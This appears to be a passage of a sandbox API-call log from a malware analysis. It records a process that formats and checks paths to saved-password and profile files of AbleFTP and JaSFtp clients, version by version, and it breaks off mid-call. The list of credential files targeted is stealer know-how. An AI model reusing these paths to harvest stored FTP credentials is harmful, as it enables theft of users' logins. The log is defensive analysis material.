[0128.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.070] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.075] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\sshProfiles-j.jsd") returned 63 [0128.075] GetProcessHeap () returned 0x6a0000 [0128.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6bac30 [0128.075] GetProcessHeap () returned 0x6a0000 [0128.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.077] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.077] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\sshProfiles-j.jsd") returned 0 [0128.077] GetProcessHeap () returned 0x6a0000 [0128.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.077] GetProcessHeap () returned 0x6a0000 [0128.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.078] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.079] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0128.079] GetProcessHeap () returned 0x6a0000 [0128.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6bac30 [0128.079] GetProcessHeap () returned 0x6a0000 [0128.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.081] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.081] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0128.081] GetProcessHeap () returned 0x6a0000 [0128.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.082] GetProcessHeap () returned 0x6a0000 [0128.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bb458 [0128.083] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.093] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP9\\encPwd.jsd") returned 42 [0128.093] GetProcessHeap () returned 0x6a0000 [0128.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x6b9518 [0128.093] GetProcessHeap () returned 0x6a0000 [0128.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.094] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.095] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP9\\encPwd.jsd") returned 0 [0128.095] GetProcessHeap () returned 0x6a0000 [0128.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.095] GetProcessHeap () returned 0x6a0000 [0128.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.096] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.097] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\sshProfiles-j.jsd") returned 63 [0128.097] GetProcessHeap () returned 0x6a0000 [0128.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6bac30 [0128.097] GetProcessHeap () returned 0x6a0000 [0128.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.098] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.099] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\sshProfiles-j.jsd") returned 0 [0128.099] GetProcessHeap () returned 0x6a0000 [0128.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.099] GetProcessHeap () returned 0x6a0000 [0128.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.101] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.102] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0128.102] GetProcessHeap () returned 0x6a0000 [0128.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6bac30 [0128.102] GetProcessHeap () returned 0x6a0000 [0128.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.103] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0128.104] GetProcessHeap () returned 0x6a0000 [0128.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.104] GetProcessHeap () returned 0x6a0000 [0128.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bb458 [0128.105] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.105] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP10\\encPwd.jsd") returned 43 [0128.106] GetProcessHeap () returned 0x6a0000 [0128.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5a) returned 0x6b9518 [0128.106] GetProcessHeap () returned 0x6a0000 [0128.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.107] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.107] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP10\\encPwd.jsd") returned 0 [0128.107] GetProcessHeap () returned 0x6a0000 [0128.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.107] GetProcessHeap () returned 0x6a0000 [0128.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.108] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.109] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\sshProfiles-j.jsd") returned 64 [0128.109] GetProcessHeap () returned 0x6a0000 [0128.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x84) returned 0x6bac30 [0128.109] GetProcessHeap () returned 0x6a0000 [0128.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.110] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.110] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\sshProfiles-j.jsd") returned 0 [0128.110] GetProcessHeap () returned 0x6a0000 [0128.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.111] GetProcessHeap () returned 0x6a0000 [0128.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.111] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.112] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0128.112] GetProcessHeap () returned 0x6a0000 [0128.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x84) returned 0x6bac30 [0128.112] GetProcessHeap () returned 0x6a0000 [0128.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.114] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.114] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0128.114] GetProcessHeap () returned 0x6a0000 [0128.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.114] GetProcessHeap () returned 0x6a0000 [0128.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bb458 [0128.118] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.119] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP11\\encPwd.jsd") returned 43 [0128.119] GetProcessHeap () returned 0x6a0000 [0128.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5a) returned 0x6b9518 [0128.119] GetProcessHeap () returned 0x6a0000 [0128.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.120] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.120] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP11\\encPwd.jsd") returned 0 [0128.120] GetProcessHeap () returned 0x6a0000 [0128.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.121] GetProcessHeap () returned 0x6a0000 [0128.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.121] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.122] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\sshProfiles-j.jsd") returned 64 [0128.122] GetProcessHeap () returned 0x6a0000 [0128.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x84) returned 0x6bac30 [0128.122] GetProcessHeap () returned 0x6a0000 [0128.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.124] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.124] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\sshProfiles-j.jsd") returned 0 [0128.124] GetProcessHeap () returned 0x6a0000 [0128.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.125] GetProcessHeap () returned 0x6a0000 [0128.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.126] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.126] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0128.127] GetProcessHeap () returned 0x6a0000 [0128.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x84) returned 0x6bac30 [0128.127] GetProcessHeap () returned 0x6a0000 [0128.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.128] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.128] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0128.128] GetProcessHeap () returned 0x6a0000 [0128.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.129] GetProcessHeap () returned 0x6a0000 [0128.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bb458 [0128.129] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.130] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP12\\encPwd.jsd") returned 43 [0128.130] GetProcessHeap () returned 0x6a0000 [0128.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5a) returned 0x6b9518 [0128.130] GetProcessHeap () returned 0x6a0000 [0128.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.132] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.132] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP12\\encPwd.jsd") returned 0 [0128.133] GetProcessHeap () returned 0x6a0000 [0128.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.133] GetProcessHeap () returned 0x6a0000 [0128.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.134] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.135] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\sshProfiles-j.jsd") returned 64 [0128.135] GetProcessHeap () returned 0x6a0000 [0128.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x84) returned 0x6bac30 [0128.135] GetProcessHeap () returned 0x6a0000 [0128.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.140] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.141] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\sshProfiles-j.jsd") returned 0 [0128.141] GetProcessHeap () returned 0x6a0000 [0128.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.141] GetProcessHeap () returned 0x6a0000 [0128.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.143] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.144] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0128.144] GetProcessHeap () returned 0x6a0000 [0128.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x84) returned 0x6bac30 [0128.144] GetProcessHeap () returned 0x6a0000 [0128.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.146] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.146] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0128.146] GetProcessHeap () returned 0x6a0000 [0128.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.147] GetProcessHeap () returned 0x6a0000 [0128.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bb458 [0128.148] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.148] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP13\\encPwd.jsd") returned 43 [0128.149] GetProcessHeap () returned 0x6a0000 [0128.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5a) returned 0x6b9518 [0128.149] GetProcessHeap () returned 0x6a0000 [0128.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.150] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.150] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP13\\encPwd.jsd") returned 0 [0128.151] GetProcessHeap () returned 0x6a0000 [0128.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.151] GetProcessHeap () returned 0x6a0000 [0128.151] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.152] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.153] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\sshProfiles-j.jsd") returned 64 [0128.153] GetProcessHeap () returned 0x6a0000 [0128.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x84) returned 0x6bac30 [0128.153] GetProcessHeap () returned 0x6a0000 [0128.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.155] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.155] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\sshProfiles-j.jsd") returned 0 [0128.155] GetProcessHeap () returned 0x6a0000 [0128.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.155] GetProcessHeap () returned 0x6a0000 [0128.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.156] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.164] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0128.164] GetProcessHeap () returned 0x6a0000 [0128.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x84) returned 0x6bac30 [0128.164] GetProcessHeap () returned 0x6a0000 [0128.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.165] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.165] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0128.165] GetProcessHeap () returned 0x6a0000 [0128.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.166] GetProcessHeap () returned 0x6a0000 [0128.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bb458 [0128.167] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.167] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP14\\encPwd.jsd") returned 43 [0128.168] GetProcessHeap () returned 0x6a0000 [0128.168] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5a) returned 0x6b9518 [0128.168] GetProcessHeap () returned 0x6a0000 [0128.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.170] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.171] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP14\\encPwd.jsd") returned 0 [0128.171] GetProcessHeap () returned 0x6a0000 [0128.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.171] GetProcessHeap () returned 0x6a0000 [0128.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.173] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.174] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\sshProfiles-j.jsd") returned 64 [0128.174] GetProcessHeap () returned 0x6a0000 [0128.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x84) returned 0x6bac30 [0128.174] GetProcessHeap () returned 0x6a0000 [0128.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.176] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.176] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\sshProfiles-j.jsd") returned 0 [0128.176] GetProcessHeap () returned 0x6a0000 [0128.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.177] GetProcessHeap () returned 0x6a0000 [0128.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.178] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.178] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0128.178] GetProcessHeap () returned 0x6a0000 [0128.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x84) returned 0x6bac30 [0128.179] GetProcessHeap () returned 0x6a0000 [0128.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.180] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.180] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0128.180] GetProcessHeap () returned 0x6a0000 [0128.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.181] GetProcessHeap () returned 0x6a0000 [0128.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bb458 [0128.182] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.182] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp7\\encPwd.jsd") returned 41 [0128.182] GetProcessHeap () returned 0x6a0000 [0128.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x56) returned 0x6b9518 [0128.182] GetProcessHeap () returned 0x6a0000 [0128.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.184] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.184] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp7\\encPwd.jsd") returned 0 [0128.184] GetProcessHeap () returned 0x6a0000 [0128.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.185] GetProcessHeap () returned 0x6a0000 [0128.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.185] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.186] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\sshProfiles-j.jsd") returned 62 [0128.186] GetProcessHeap () returned 0x6a0000 [0128.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6b9518 [0128.186] GetProcessHeap () returned 0x6a0000 [0128.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.188] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.188] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\sshProfiles-j.jsd") returned 0 [0128.188] GetProcessHeap () returned 0x6a0000 [0128.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.189] GetProcessHeap () returned 0x6a0000 [0128.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.190] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.191] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\ftpProfiles-j.jsd") returned 62 [0128.191] GetProcessHeap () returned 0x6a0000 [0128.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6b9518 [0128.191] GetProcessHeap () returned 0x6a0000 [0128.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.194] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.194] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0128.194] GetProcessHeap () returned 0x6a0000 [0128.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.195] GetProcessHeap () returned 0x6a0000 [0128.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bb458 [0128.196] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.197] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp8\\encPwd.jsd") returned 41 [0128.198] GetProcessHeap () returned 0x6a0000 [0128.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x56) returned 0x6b9518 [0128.198] GetProcessHeap () returned 0x6a0000 [0128.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.199] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.200] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp8\\encPwd.jsd") returned 0 [0128.200] GetProcessHeap () returned 0x6a0000 [0128.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.200] GetProcessHeap () returned 0x6a0000 [0128.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.207] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.207] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\sshProfiles-j.jsd") returned 62 [0128.207] GetProcessHeap () returned 0x6a0000 [0128.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6b9518 [0128.208] GetProcessHeap () returned 0x6a0000 [0128.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: 